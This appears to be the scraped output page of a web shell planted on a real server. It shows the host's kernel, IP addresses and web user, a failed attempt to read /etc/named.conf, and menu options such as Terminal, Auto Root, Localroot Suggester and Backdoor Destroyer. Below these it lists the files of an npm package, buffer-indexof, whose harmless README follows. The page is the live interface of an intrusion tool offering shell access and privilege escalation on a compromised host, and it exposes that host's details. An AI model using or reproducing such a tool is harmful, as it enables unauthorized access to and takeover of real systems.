Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.219.151.249
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
buffer-indexof /
Delete
Unzip
Name
Size
Permission
Date
Action
test
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.travis.yml
61
B
-rw-r--r--
2016-09-01 12:44
LICENSE
1.05
KB
-rw-r--r--
2015-08-10 18:47
README.md
729
B
-rw-r--r--
2016-08-29 13:24
bm.js
1.1
KB
-rw-r--r--
2016-08-30 13:02
index.js
1.5
KB
-rw-r--r--
2016-09-01 13:32
package.json
1.33
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
[](http://travis-ci.org/soldair/node-buffer-indexof) buffer-indexof =================== find the index of a buffer in a buffer. should behave like String.indexOf etc. ```js var bindexOf = require('buffer-indexof'); var newLineBuffer = new Buffer("\n"); var b = new Buffer("hi\nho\nsilver"); bindexOf(b,newLineBuffer) === 2 // you can also start from index bindexOf(b,newLineBuffer,3) === 5 // no match === -1 bindexOf(b,newLineBuffer,6) === -1 ``` CHANGELOG ---------- - 1.0.0 - fixed issue finding multibyte needles in haystack. thanks @imulus - 1.0.1 - fixed failing to find partial matches as pointed out by @bahaa-aidi in #2